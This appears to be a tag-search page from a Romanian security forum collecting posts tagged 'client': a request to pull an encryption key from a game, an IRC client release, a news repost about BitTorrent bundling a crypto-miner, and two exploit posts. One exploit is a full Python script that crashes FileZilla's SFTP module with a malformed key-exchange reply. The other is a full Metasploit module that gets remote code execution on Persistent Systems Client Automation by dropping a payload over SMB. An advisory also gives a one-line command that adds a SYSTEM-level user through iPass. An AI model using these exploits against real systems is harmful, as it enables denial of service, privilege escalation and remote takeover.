Search the Community
Showing results for tags 'client'.
-
Hi guys, i know the title must sound obsolete for ya, but i've seen in the past romanian managed to "hack" a previous version of this game. https://world.triviador.net the security has changed since then, i'm wondering if there's anyone that can still make an xml grabber for it. from what i know, if you search "sharedkey" or "rsapublickey" with a memory viewer through firefox for ex, you can see a huge key. i believe that rsa key is used to encrypt the key used for decrypting the xml. anyway, i have managed to write the actual decryption algorithm for decoding the xml, and maybe for decoding the key too, but i can't get the encrypted key out from the memory of any browser. i'm curious if anyone could do that. =] ~ Cheers ~
-
# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability # Date: 5-6-2015 # Vendor homepage: http://www.chiark.greenend.org.uk # Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe # Version: 3.11.0.2 # Author: 3unnym00n # Details: # -------- # sftp module for filezilla based on putty's psftp component. # when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash # Tested On: win7, xp # operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1 ''' import socket import struct soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() ## do banner exchange ## send server banner client.send('SSH-2.0-SUCK\r\n') ## recv client banner client_banner = '' while True: data = client.recv(1) if data == '\x0a': break client_banner += data print 'the client banner is: %s'%client_banner.__repr__() ## do key exchange ## recv client algorithms str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send server algorithms client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex')) ## do dh key exchange ## recv dh group exchange request str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange group client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex')) ## recv dh group exchange init str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange reply dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl dh_gex_reply_msg += '\x09' ## padding len dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 client.sendall(dh_gex_reply_msg) Source: https://dl.packetstormsecurity.net/1506-exploits/filezilla-dos.txt
-
Am facut un client de IRC special pentru canalul #rstforums de pe freenode Trebuie sa va logati cu userul si parola de pe forum (am facut asta pentru a preveni spamul, pentru a sti cine e cine, etc) Trebuie sa aveti instalat .net Framework 4.5 pentru a rula programul. Screenshots: Login form: Main form: Ce stie sa faca: - Logare pe baza forumului - Design frumusel - Sunet la primirea unui mesaj - Iconita din taskbar blinkaie la primirea unui mesaj - Trimiterea mesajului prin apasarea tastei enter in textbox Buguri existente: - Uneori crash la inchiderea programului. - Ferestrele se numesc Form1/Form2, am uitat sa schimb numele. Daca gasiti alte buguri, va rog sa le raportati. Download: IRC Client.exe — RGhost — file sharing Virus scan: https://www.virustotal.com/en/file/aca49cfc58dd5be22e9d2ac25ba08b2e8d66e670fd542a94a27cd7e4b0b0bba6/analysis/1427018283/ Update 1: - va puteti loga cu username-uri care au puncte in ele - notificare cand in user iese/intra/isi schimba nickul
- 7 replies
-
- 1
-
- #rstforums
- client
-
(and 3 more)
Tagged with:
-
Mogwai Security Advisory MSA-2015-03 ---------------------------------------------------------------------- Title: iPass Mobile Client service local privilege escalation Product: iPass Mobile Client Affected versions: iPass Mobile Client 2.4.2.15122 (Newer version might be also affected) Impact: medium Remote: no Product link: http://www.ipass.com/laptops/ Reported: 11/03/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- The iPass Open Mobile client for laptops is lightweight and always on. It provides easy, seamless connectivity across iPass, customer, and third-party networks, and allows you to mix and match carrier networks without disrupting your users. The iPass Open Mobile client for laptops allows organizations to provide granular options for how employees connect to iPass Wi-Fi (the iPass Mobile Network), campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single platform to manage all connections. Open Mobile also enables cost and security controls that provide virtual private network (VPN) integration options; mobile broadband 3G/4G usage controls for both data roaming and data usage; endpoint integrity verification that checks the security of the device at the point of connection; and several additional options for setting network connection and restriction policies. Insight into an organizations mobility usage is provided through user and device activity and summary reports as well as mobile broadband usage reports. ----------------------------------------------------------------------- Vendor response: ----------------------------------------------------------------------- "We do not consider this a vulnerability as it is how the product was designed" Business recommendation: ----------------------------------------------------------------------- Disable the iPass service unless really required -- CVSS2 Ratings ------------------------------------------------------ CVSS Base Score: 5.6 Impact Subscore: 7.8 Exploitability Subscore: 3.9 CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N) ----------------------------------------------------------------------- Vulnerability description: ---------------------------------------------------------------------- The iPass Open Mobile Windows Client utilizes named pipes for interprocess communication. One of these pipes accepts/forwards commands to the iPass plugin subsystem. A normal user can communicate with this pipe through the command line client EPCmd.exe which is part of the iPass suite. A list of available commands can be displayed via "System.ListAllCommands". The iPass pipe provides a "iPass.EventsAction.LaunchAppSysMode" command which allows to execute arbitrary commands as SYSTEM. This can be abused by a normal user to escalate his local privileges. Please note that this issue can also be exploited remotely in version 2.4.2.15122 as the named pipe can also be called via SMB. However according to our information, the pipe is no longer remotely accessible in current versions of the iPass Mobile client. Proof of concept: ---------------------------------------------------------------------- The following EPCmd command line creates a local user "mogwai" with password "mogwai": EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c net user mogwai mogwai /ADD;; Disclosure timeline: ---------------------------------------------------------------------- 10/03/2015: Requesting security contact from iPass sales 10/03/2015: Sales responded, will forward vulnerability information to the development 11/03/2015: Sending vulnerability details 11/03/2015: iPass asks which customer we represent 11/03/2015: Responding that we don't represent any iPass customer 12/03/2015: iPass responded, wont fix, says that the product works as designed Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source
-
BitTorrent apologizes for Epic Scale crypto-miner installed with ?Torrent torrent client with after user outrage BitTorrent apologizes for Epic Scale Bitcoin mining software that users say was shadily installed ?Torrent torrent client, offers an uninstall guide BitTorrent the maker of widely popular ?Torrent torrent client came under severe fire from all quarters for bundling the popular with cryptocurrency mining software with the ?Torrent torrent client. BitTorrent was not only criticised on different websites but also on its own ?Torrent forum with users blasting it for installing the Epic Scale cryptocurrency miner without asking users for permission or warning them about it. Under the unrelenting barrage of criticism, BitTorrent today apologized to its ?Torrent torrent client users. Writing on the ?Torrent forum, a member of BitTorrent staff said that they had paused the installation of Epic Scale software with ?Torrent client. We understand the concerns that have been raised about our partner offer with Epic Scale. Amid user feedback, on Friday, mid-day we paused the offer to allow time for us to do an evaluation. For users who already installed the Epic Scale software with ?Torrent client and want to remove it conventionally, you are requested to visit the uninstall guide site here. BitTorrent also clarified that the Epic Scale software was shipped only with the Windows client and therefore Linux and Mac machines are not affected by this cryptomining software. BitTorrent however tried to muzzle the claims that the software itself was bad and went on to give a detailed reasoning for shadow installing the Epic Scale software. “There have been a lot of claims over the past few days, some of them fair and some pretty wild. We have always invited an open and constructive dialogue, particularly through our forums, and want that to continue.” “As we’ve discussed in the past, partner offers are one of the ways we generate revenue. Many of you already understand that this is a common model for software companies that provide products and technology for free. Our policy is that these offers are strictly optional and we have never done a silent install; in fact, we built our installer technology to make silent installs impossible. The offers we choose and how we present them are something we strive to get right, and we think we’ve been mostly successful over the last four years.” “That being said – from the feedback we’ve received, it is clear that we misjudged how users would react to this offer; this software is truly different from our previous offers and therefore deserves special attention. For this, we unequivocally apologize to our affected users.” The ?Torrent client were however not happy with the apology. A poster on the forum demanded the BitTorrent should permanently stop such installations while another asked BitTorrent to consider the damage it may have cost, “I may ask that for the next set of offers that full testing be done to ensure that zero threats of malware/adware/spyware is given free reign over the client’s system. Meaning, a system set up that a normal person would use with a normal AV program. Once the package is installed, an array of mal/spy/adware cleaners are put to work to see how deep these packages go and how they are treated by the cleaners. This situation would pale in comparision if a genuine threat was unleashed by accident.” SURSA: BitTorrent apologizes for Epic Scale crypto-miner installed with ?Torrent torrent client with after user outrage Se pare ca nu e de la adware si alte programe intalate din greseala fiindca uiti sau nu vezi sa dai uncheck atunci cand instalezi utorrent.
- 23 replies
-
- bittorrent
- client
-
(and 3 more)
Tagged with:
-
Persistent Systems Client Automation Command Injection RCE
Kalashnikov. posted a topic in Exploituri
# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability # Date: 2014-10-01 # Exploit Author: Ben Turner # Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/ # Version: 7.9, 8.1, 9.0, 9.1 # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008 # CVE-2015-1497 # CVSS: 10 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability', 'Description' => %Q{ This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. }, 'Author' => [ 'Ben Turner' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'January 10 2014' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']), OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']), Opt::RPORT(3465), ], self.class) end def exploit createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\"" createservice << "\x22\x00\x00\x00" startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" startservice << "Nvdkit service start test" startservice << "\x22\x00\x00\x00" removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" removeservice << "Nvdkit service remove test" removeservice << "\x22\x00\x00\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") exe = generate_payload_exe fd = smb_open("\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") file = "\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n") else print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(createservice) print_status("Creating the callback payload and installing the remote service") disconnect sleep(5) connect() sock.put(startservice) print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service") disconnect sleep(30) connect sock.put(removeservice) disconnect rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end end end-
- automation
- client
-
(and 3 more)
Tagged with: